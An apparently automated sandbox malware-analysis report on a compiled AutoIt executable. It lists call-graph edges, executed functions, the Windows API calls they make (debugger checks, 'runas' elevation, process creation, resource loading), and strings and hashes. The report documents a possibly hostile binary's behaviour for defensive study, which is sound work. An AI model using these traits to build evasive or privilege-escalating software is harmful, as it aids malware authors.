94879->94881 94882 7ff7ec19b3d0 94880->94882 94883 7ff7ec19b41e 94880->94883 94884 7ff7ec19b334 4 API calls 94881->94884 94886 7ff7ec19b3f1 94882->94886 94887 7ff7ec19b3dd 94882->94887 94933 7ff7ec19b458 8 API calls 94883->94933 94896 7ff7ec19b410 Concurrency::wait 94884->94896 94931 7ff7ec12a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94886->94931 94929 7ff7ec12a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94887->94929 94890 7ff7ec19b3f6 94932 7ff7ec19b270 6 API calls 94890->94932 94891 7ff7ec19b3e2 94930 7ff7ec144120 6 API calls 94891->94930 94894 7ff7ec19b3ef 94926 7ff7ec19b384 94894->94926 94896->94659 94898 7ff7ec144c68 4 API calls 94897->94898 94899 7ff7ec128363 94898->94899 94900 7ff7ec128314 CloseHandle 94899->94900 94901 7ff7ec12836f 94900->94901 94902 7ff7ec129640 4 API calls 94901->94902 94903 7ff7ec128378 94902->94903 94904 7ff7ec128314 CloseHandle 94903->94904 94905 7ff7ec128380 94904->94905 94905->94632 94907 7ff7ec128314 CloseHandle 94906->94907 94908 7ff7ec12685a 94907->94908 94909 7ff7ec16caa8 94908->94909 94910 7ff7ec12687d CreateFileW 94908->94910 94911 7ff7ec16caae CreateFileW 94909->94911 94918 7ff7ec1268d9 94909->94918 94915 7ff7ec1268ab 94910->94915 94912 7ff7ec16cae6 94911->94912 94911->94915 94936 7ff7ec126a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94912->94936 94914 7ff7ec16caf3 94914->94915 94921 7ff7ec1268e4 94915->94921 94934 7ff7ec1268f4 9 API calls 94915->94934 94917 7ff7ec1268c1 94917->94918 94935 7ff7ec126a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94917->94935 94919 7ff7ec19b334 4 API calls 94918->94919 94918->94921 94919->94921 94921->94636 94921->94641 94922->94638 94937 7ff7ec19b188 94923->94937 94927 7ff7ec19b334 4 API calls 94926->94927 94928 7ff7ec19b399 94927->94928 94928->94896 94929->94891 94930->94894 94931->94890 94932->94894 94933->94896 94934->94917 94935->94918 94936->94914 94938 7ff7ec19b193 94937->94938 94939 7ff7ec19b19c WriteFile 94937->94939 94941 7ff7ec19b208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 94938->94941 94939->94659 94941->94939 94942->94679 94943->94682 94944->94688 94945->94696 94946->94690 94947->94711 94948 7ff7ec17e263 94949 7ff7ec17e271 94948->94949 94959 7ff7ec132680 94948->94959 94949->94949 94950 7ff7ec1329c8 PeekMessageW 94950->94959 94951 7ff7ec1326da GetInputState 94951->94950 94951->94959 94953 7ff7ec17d181 TranslateAcceleratorW 94953->94959 94954 7ff7ec132a1f TranslateMessage DispatchMessageW 94955 7ff7ec132a33 PeekMessageW 94954->94955 94955->94959 94956 7ff7ec1328b9 timeGetTime 94956->94959 94957 7ff7ec17d2bb timeGetTime 94981 7ff7ec142ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94957->94981 94959->94950 94959->94951 94959->94953 94959->94954 94959->94955 94959->94956 94959->94957 94963 7ff7ec1366c0 300 API calls 94959->94963 94964 7ff7ec132856 94959->94964 94965 7ff7ec133c20 300 API calls 94959->94965 94966 7ff7ec1a34e4 77 API calls 94959->94966 94968 7ff7ec132b70 94959->94968 94975 7ff7ec142de8 94959->94975 94980 7ff7ec132e30 300 API calls 2 library calls 94959->94980 94982 7ff7ec1a3a28 VariantClear RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 94959->94982 94983 7ff7ec1ba320 300 API calls Concurrency::wait 94959->94983 94963->94959 94965->94959 94966->94959 94969 7ff7ec132b96 94968->94969 94971 7ff7ec132ba9 94968->94971 94984 7ff7ec132050 94969->94984 95004 7ff7ec1a34e4 77 API calls 3 library calls 94971->95004 94972 7ff7ec132b9e 94972->94959 94974 7ff7ec17e55c 94976 7ff7ec142e0d 94975->94976 94977 7ff7ec142e2a 94975->94977 94976->94959 94977->94976 94978 7ff7ec142e5b IsDialogMessageW 94977->94978 94979 7ff7ec189d94 GetClassLongPtrW 94977->94979 94978->94976 94978->94977 94979->94977 94979->94978 94980->94959 94981->94959 94982->94959 94983->94959 94985 7ff7ec133c20 300 API calls 94984->94985 94986 7ff7ec1320a8 94985->94986 94987 7ff7ec13212d 94986->94987 94988 7ff7ec17d06f 94986->94988 94991 7ff7ec132552 94986->94991 94996 7ff7ec132244 94986->94996 95000 7ff7ec1323cb memcpy_s 94986->95000 95001 7ff7ec1322a5 memcpy_s 94986->95001 94987->94972 95009 7ff7ec1a34e4 77 API calls 3 library calls 94988->95009 94990 7ff7ec17d08d 94993 7ff7ec144c68 4 API calls 94991->94993 94992 7ff7ec17d036 95007 7ff7ec12ee20 5 API calls Concurrency::wait 94992->95007 94993->95000 94995 7ff7ec144c68 4 API calls 94995->95001 94996->95000 95005 7ff7ec131ce4 301 API calls Concurrency::wait 94996->95005 94997 7ff7ec17d062 95008 7ff7ec12ee20 5 API calls Concurrency::wait 94997->95008 95000->94992 95003 7ff7ec1a34e4 77 API calls 95000->95003 95006 7ff7ec124a60 300 API calls 95000->95006 95001->94995 95001->95000 95003->95000 95004->94974 95005->95001 95006->95000 95007->94997 95008->94988 95009->94990 95010 7ff7ec17b221 95011 7ff7ec17b22a 95010->95011 95018 7ff7ec130378 95010->95018 95033 7ff7ec1947bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95011->95033 95013 7ff7ec17b241 95034 7ff7ec194708 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95013->95034 95015 7ff7ec17b264 95016 7ff7ec133c20 300 API calls 95015->95016 95017 7ff7ec17b292 95016->95017 95024 7ff7ec130405 95017->95024 95035 7ff7ec1b8d98 49 API calls Concurrency::wait 95017->95035 95027 7ff7ec12f7b8 95018->95027 95021 7ff7ec13070a 95022 7ff7ec17b2d9 Concurrency::wait 95022->95018 95036 7ff7ec1947bc RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 95022->95036 95024->95021 95026 7ff7ec12e0a8 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95024->95026 95037 7ff7ec12ee20 5 API calls Concurrency::wait 95024->95037 95026->95024 95031 7ff7ec12f7d5 95027->95031 95028 7ff7ec12f7de 95028->95024 95029 7ff7ec129640 4 API calls 95029->95031 95030 7ff7ec12e0a8 4 API calls 95030->95031 95031->95028 95031->95029 95031->95030 95032 7ff7ec12f7b8 4 API calls 95031->95032 95032->95031 95033->95013 95034->95015 95035->95022 95036->95022 95037->95024 95038 7ff7ec17f890 95047 7ff7ec12e18c 95038->95047 95040 7ff7ec17f8a9 95044 7ff7ec17f915 Concurrency::wait 95040->95044 95053 7ff7ec142ac0 CharUpperBuffW RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95040->95053 95043 7ff7ec17f8f6 95043->95044 95054 7ff7ec1a1464 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 95043->95054 95045 7ff7ec1803e1 Concurrency::wait 95044->95045 95055 7ff7ec1a34e4 77 API calls 3 library calls 95044->95055 95048 7ff7ec12e1a7 95047->95048 95049 7ff7ec12e1c2 95047->95049 95056 7ff7ec12ee20 5 API calls Concurrency::wait 95048->95056 95050 7ff7ec12e1af 95049->95050 95057 7ff7ec12ee20 5 API calls Concurrency::wait 95049->95057 95050->95040 95053->95043 95055->95045 95056->95050 95057->95050

                                                            Executed Functions

                                                            Function 00007FF7EC1237B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC1237F2
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123807
                                                            • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC12388D
                                                              • Part of subcall function 00007FF7EC123F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7EC1238BF,?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123FFD
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC123924
                                                            • MessageBoxA.USER32 ref: 00007FF7EC16B888
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC16B8E1
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7EC123785), ref: 00007FF7EC16B968
                                                            • ShellExecuteW.SHELL32 ref: 00007FF7EC16B98F
                                                              • Part of subcall function 00007FF7EC123B84: GetSysColorBrush.USER32 ref: 00007FF7EC123B9E
                                                              • Part of subcall function 00007FF7EC123B84: LoadCursorW.USER32 ref: 00007FF7EC123BAE
                                                              • Part of subcall function 00007FF7EC123B84: LoadIconW.USER32 ref: 00007FF7EC123BC3
                                                              • Part of subcall function 00007FF7EC123B84: LoadIconW.USER32 ref: 00007FF7EC123BDC
                                                              • Part of subcall function 00007FF7EC123B84: LoadIconW.USER32 ref: 00007FF7EC123BF5
                                                              • Part of subcall function 00007FF7EC123B84: LoadImageW.USER32 ref: 00007FF7EC123C21
                                                              • Part of subcall function 00007FF7EC123B84: RegisterClassExW.USER32 ref: 00007FF7EC123C85
                                                              • Part of subcall function 00007FF7EC123CBC: CreateWindowExW.USER32 ref: 00007FF7EC123D0C
                                                              • Part of subcall function 00007FF7EC123CBC: CreateWindowExW.USER32 ref: 00007FF7EC123D5F
                                                              • Part of subcall function 00007FF7EC123CBC: ShowWindow.USER32 ref: 00007FF7EC123D75
                                                              • Part of subcall function 00007FF7EC126258: Shell_NotifyIconW.SHELL32 ref: 00007FF7EC126350
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                            • API String ID: 1593035822-3287110873
                                                            • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction ID: be80b0f80cd397c992bedfcf9fc297171692c9c84eadc267af4dfb4f9409be84
                                                            • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                            • Instruction Fuzzy Hash: 1B711BADA1C68395FA24BB21F8803B9E768AF45344FC00137E55D062A6DE7CE509D332
                                                            Function 00007FF7EC126580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 352 7ff7ec126580-7ff7ec1265fc call 7ff7ec144c68 call 7ff7ec126c98 call 7ff7ec145d00 359 7ff7ec126737-7ff7ec12673a 352->359 360 7ff7ec126602-7ff7ec126606 352->360 361 7ff7ec16c9f5-7ff7ec16c9fd call 7ff7ec1a2e00 359->361 362 7ff7ec126740-7ff7ec126753 CreateStreamOnHGlobal 359->362 363 7ff7ec12660c-7ff7ec126617 call 7ff7ec155514 360->363 364 7ff7ec16ca03-7ff7ec16ca1e 360->364 361->364 362->360 366 7ff7ec126759-7ff7ec126777 FindResourceExW 362->366 372 7ff7ec12661b-7ff7ec12664e call 7ff7ec1267d8 363->372 375 7ff7ec16ca27-7ff7ec16ca60 call 7ff7ec126810 call 7ff7ec1267d8 364->375 366->360 371 7ff7ec12677d 366->371 373 7ff7ec16c97e-7ff7ec16c991 LoadResource 371->373 380 7ff7ec1266e8 372->380 381 7ff7ec126654-7ff7ec12665f 372->381 373->360 376 7ff7ec16c997-7ff7ec16c9a8 SizeofResource 373->376 384 7ff7ec1266ee 375->384 397 7ff7ec16ca66 375->397 376->360 379 7ff7ec16c9ae-7ff7ec16c9ba LockResource 376->379 379->360 383 7ff7ec16c9c0-7ff7ec16c9f0 379->383 380->384 385 7ff7ec1266ae-7ff7ec1266b2 381->385 386 7ff7ec126661-7ff7ec12666f 381->386 383->360 388 7ff7ec1266f1-7ff7ec126715 384->388 385->380 390 7ff7ec1266b4-7ff7ec1266cf call 7ff7ec126810 385->390 389 7ff7ec126670-7ff7ec12667d 386->389 393 7ff7ec126717-7ff7ec126724 call 7ff7ec144c24 * 2 388->393 394 7ff7ec126729-7ff7ec126736 388->394 395 7ff7ec126680-7ff7ec12668f 389->395 390->372 393->394 400 7ff7ec126691-7ff7ec126695 395->400 401 7ff7ec1266d4-7ff7ec1266dd 395->401 397->388 400->375 406 7ff7ec12669b-7ff7ec1266a8 400->406 403 7ff7ec126782-7ff7ec12678c 401->403 404 7ff7ec1266e3-7ff7ec1266e6 401->404 409 7ff7ec126797-7ff7ec1267a1 403->409 410 7ff7ec12678e 403->410 404->400 406->389 408 7ff7ec1266aa 406->408 408->385 411 7ff7ec1267ce 409->411 412 7ff7ec1267a3-7ff7ec1267ad 409->412 410->409 411->373 413 7ff7ec1267af-7ff7ec1267bb 412->413 414 7ff7ec1267c6 412->414 413->395 415 7ff7ec1267c1 413->415 414->411 415->414
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: AU3!$EA06$SCRIPT
                                                            • API String ID: 3051347437-2925976212
                                                            • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction ID: a252a0850e697df7a53a355dfe348ecdae3d615055cd24718c5829791197df8f
                                                            • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                            • Instruction Fuzzy Hash: 529101BAB09641C6EB24AB21B444BBCABA0BB45BC4F854137DE8D477C5DF38E405D322
                                                            Function 00007FF7EC141D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 482 7ff7ec141d80-7ff7ec141e17 call 7ff7ec129640 GetVersionExW call 7ff7ec127cf4 487 7ff7ec189450 482->487 488 7ff7ec141e1d 482->488 490 7ff7ec189457-7ff7ec18945d 487->490 489 7ff7ec141e20-7ff7ec141e46 call 7ff7ec12dda4 488->489 496 7ff7ec141e4c 489->496 497 7ff7ec141fc1 489->497 492 7ff7ec189463-7ff7ec189480 490->492 492->492 494 7ff7ec189482-7ff7ec189485 492->494 494->489 495 7ff7ec18948b-7ff7ec189491 494->495 495->490 498 7ff7ec189493 495->498 499 7ff7ec141e53-7ff7ec141e59 496->499 497->487 501 7ff7ec189498-7ff7ec1894a1 498->501 500 7ff7ec141e5f-7ff7ec141e7c 499->500 500->500 502 7ff7ec141e7e-7ff7ec141e81 500->502 501->499 503 7ff7ec1894a7 501->503 502->501 504 7ff7ec141e87-7ff7ec141ed6 call 7ff7ec12dda4 502->504 503->497 507 7ff7ec189645-7ff7ec18964d 504->507 508 7ff7ec141edc-7ff7ec141ede 504->508 511 7ff7ec18964f-7ff7ec189658 507->511 512 7ff7ec18965a-7ff7ec18965d 507->512 509 7ff7ec1894ac-7ff7ec1894af 508->509 510 7ff7ec141ee4-7ff7ec141efa 508->510 515 7ff7ec141f3c-7ff7ec141f80 GetCurrentProcess IsWow64Process call 7ff7ec146240 509->515 516 7ff7ec1894b5-7ff7ec189501 509->516 513 7ff7ec189572-7ff7ec189579 510->513 514 7ff7ec141f00-7ff7ec141f02 510->514 517 7ff7ec189686-7ff7ec189692 511->517 512->517 518 7ff7ec18965f-7ff7ec189674 512->518 519 7ff7ec189589-7ff7ec189599 513->519 520 7ff7ec18957b-7ff7ec189584 513->520 521 7ff7ec141f08-7ff7ec141f0b 514->521 522 7ff7ec18959e-7ff7ec1895b3 514->522 529 7ff7ec18969d-7ff7ec1896b3 call 7ff7ec1932f4 515->529 539 7ff7ec141f86-7ff7ec141f8b GetSystemInfo 515->539 516->515 524 7ff7ec189507-7ff7ec18950e 516->524 517->529 525 7ff7ec18967f 518->525 526 7ff7ec189676-7ff7ec18967d 518->526 519->515 520->515 527 7ff7ec141f11-7ff7ec141f2d 521->527 528 7ff7ec1895ed-7ff7ec1895f0 521->528 530 7ff7ec1895c3-7ff7ec1895d3 522->530 531 7ff7ec1895b5-7ff7ec1895be 522->531 533 7ff7ec189510-7ff7ec189518 524->533 534 7ff7ec189534-7ff7ec18953c 524->534 525->517 526->517 535 7ff7ec1895d8-7ff7ec1895e8 527->535 536 7ff7ec141f33 527->536 528->515 538 7ff7ec1895f6-7ff7ec189620 528->538 550 7ff7ec1896b5-7ff7ec1896d5 call 7ff7ec1932f4 529->550 551 7ff7ec1896d7-7ff7ec1896dc GetSystemInfo 529->551 530->515 531->515 540 7ff7ec189526-7ff7ec18952f 533->540 541 7ff7ec18951a-7ff7ec189521 533->541 542 7ff7ec18954c-7ff7ec189554 534->542 543 7ff7ec18953e-7ff7ec189547 534->543 535->515 536->515 545 7ff7ec189630-7ff7ec189640 538->545 546 7ff7ec189622-7ff7ec18962b 538->546 547 7ff7ec141f91-7ff7ec141fc0 539->547 540->515 541->515 548 7ff7ec189564-7ff7ec18956d 542->548 549 7ff7ec189556-7ff7ec18955f 542->549 543->515 545->515 546->515 548->515 549->515 553 7ff7ec1896e2-7ff7ec1896ea 550->553 551->553 553->547 555 7ff7ec1896f0-7ff7ec1896f7 FreeLibrary 553->555 555->547
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentInfoSystemVersionWow64
                                                            • String ID: |O
                                                            • API String ID: 1568231622-607156228
                                                            • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction ID: ca5628a528516a3c7369950af00543948cee454a580332c9171f9419ba4db0bc
                                                            • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                            • Instruction Fuzzy Hash: 40D19FADA1D2C285F620AB16BC40379BB98AF11784FD04077E59D0A7A5EEBCB105C773
                                                            Function 00007FF7EC1BF630 Relevance: 12.4, APIs: 8, Instructions: 350processCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 719 7ff7ec1bf630-7ff7ec1bf69e call 7ff7ec146240 722 7ff7ec1bf6a0-7ff7ec1bf6b8 call 7ff7ec12ffbc 719->722 723 7ff7ec1bf6d4-7ff7ec1bf6d9 719->723 731 7ff7ec1bf6ba-7ff7ec1bf6d2 call 7ff7ec12ffbc 722->731 732 7ff7ec1bf708-7ff7ec1bf70d 722->732 724 7ff7ec1bf71e-7ff7ec1bf723 723->724 725 7ff7ec1bf6db-7ff7ec1bf6ef call 7ff7ec12ffbc 723->725 728 7ff7ec1bf736-7ff7ec1bf75c call 7ff7ec12d4cc call 7ff7ec12e330 724->728 729 7ff7ec1bf725-7ff7ec1bf729 724->729 739 7ff7ec1bf6f3-7ff7ec1bf706 call 7ff7ec12ffbc 725->739 748 7ff7ec1bf762-7ff7ec1bf7cf call 7ff7ec12d4cc call 7ff7ec12e330 call 7ff7ec12d4cc call 7ff7ec12e330 call 7ff7ec12d4cc call 7ff7ec12e330 728->748 749 7ff7ec1bf840-7ff7ec1bf84a 728->749 735 7ff7ec1bf72d-7ff7ec1bf732 call 7ff7ec12ffbc 729->735 731->739 740 7ff7ec1bf70f-7ff7ec1bf717 732->740 741 7ff7ec1bf719-7ff7ec1bf71c 732->741 735->728 739->724 739->732 740->735 741->724 741->728 798 7ff7ec1bf7d1-7ff7ec1bf7f3 call 7ff7ec12d4cc call 7ff7ec12e330 748->798 799 7ff7ec1bf806-7ff7ec1bf83e GetSystemDirectoryW call 7ff7ec144c68 GetSystemDirectoryW 748->799 750 7ff7ec1bf87d-7ff7ec1bf8af GetCurrentDirectoryW call 7ff7ec144c68 GetCurrentDirectoryW 749->750 751 7ff7ec1bf84c-7ff7ec1bf86e call 7ff7ec12d4cc call 7ff7ec12e330 749->751 760 7ff7ec1bf8b5-7ff7ec1bf8b8 750->760 751->750 767 7ff7ec1bf870-7ff7ec1bf87b call 7ff7ec148d58 751->767 763 7ff7ec1bf8f0-7ff7ec1bf8ff call 7ff7ec19f464 760->763 764 7ff7ec1bf8ba-7ff7ec1bf8eb call 7ff7ec13f688 * 3 760->764 774 7ff7ec1bf901-7ff7ec1bf903 763->774 775 7ff7ec1bf905-7ff7ec1bf95d call 7ff7ec19fddc call 7ff7ec19fca8 call 7ff7ec19fafc 763->775 764->763 767->750 767->763 781 7ff7ec1bf964-7ff7ec1bf96c 774->781 775->781 809 7ff7ec1bf95f 775->809 786 7ff7ec1bf972-7ff7ec1bfa0d call 7ff7ec18d1f8 call 7ff7ec148d58 * 3 call 7ff7ec144c24 * 3 781->786 787 7ff7ec1bfa0f-7ff7ec1bfa4b CreateProcessW 781->787 791 7ff7ec1bfa4f-7ff7ec1bfa62 call 7ff7ec144c24 * 2 786->791 787->791 811 7ff7ec1bfa64-7ff7ec1bfabc call 7ff7ec124afc * 2 GetLastError call 7ff7ec13f214 call 7ff7ec1313e0 791->811 812 7ff7ec1bfabe-7ff7ec1bfaca CloseHandle 791->812 798->799 824 7ff7ec1bf7f5-7ff7ec1bf800 call 7ff7ec148d58 798->824 799->760 809->781 827 7ff7ec1bfb3b-7ff7ec1bfb65 call 7ff7ec19f51c 811->827 818 7ff7ec1bfaf5-7ff7ec1bfafc 812->818 819 7ff7ec1bfacc-7ff7ec1bfaf0 call 7ff7ec19f7dc call 7ff7ec1a0088 call 7ff7ec1bfb68 812->819 820 7ff7ec1bfafe-7ff7ec1bfb0a 818->820 821 7ff7ec1bfb0c-7ff7ec1bfb35 call 7ff7ec1313e0 CloseHandle 818->821 819->818 820->827 821->827 824->760 824->799
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 1787492119-0
                                                            • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction ID: da046d8dc3205e9abab69aaae6ce15afda1b946f49563a7e0fdefc9dc36d4543
                                                            • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                            • Instruction Fuzzy Hash: 37E1906AB08B81C5EB14EB26E5503BDA7A1FB84B88F804537EE5D477A9DF38E401C711
                                                            Function 00007FF7EC19C7C0 Relevance: 6.0, APIs: 4, Instructions: 24filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                            • String ID:
                                                            • API String ID: 2695905019-0
                                                            • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction ID: cdc2e07748c9db39bfe47beceb184322b62a90c0a96adc87534cca1c1d6534b4
                                                            • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                            • Instruction Fuzzy Hash: D1F089D5D08606C2EA24AB28B8183349361BF81BB7FD44331D4BF062E4DF7CD458C211
                                                            Function 00007FF7EC127920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                            • API String ID: 2667193904-1575078665
                                                            • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction ID: fb704b648b4e7517aa85c3c424de9f444a9e460c41336445f64043e992edd548
                                                            • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                            • Instruction Fuzzy Hash: 42913E6AA1864295EB10FB24F8402BDB364FF84784FC01133E94D47AA9DF7CD545D762
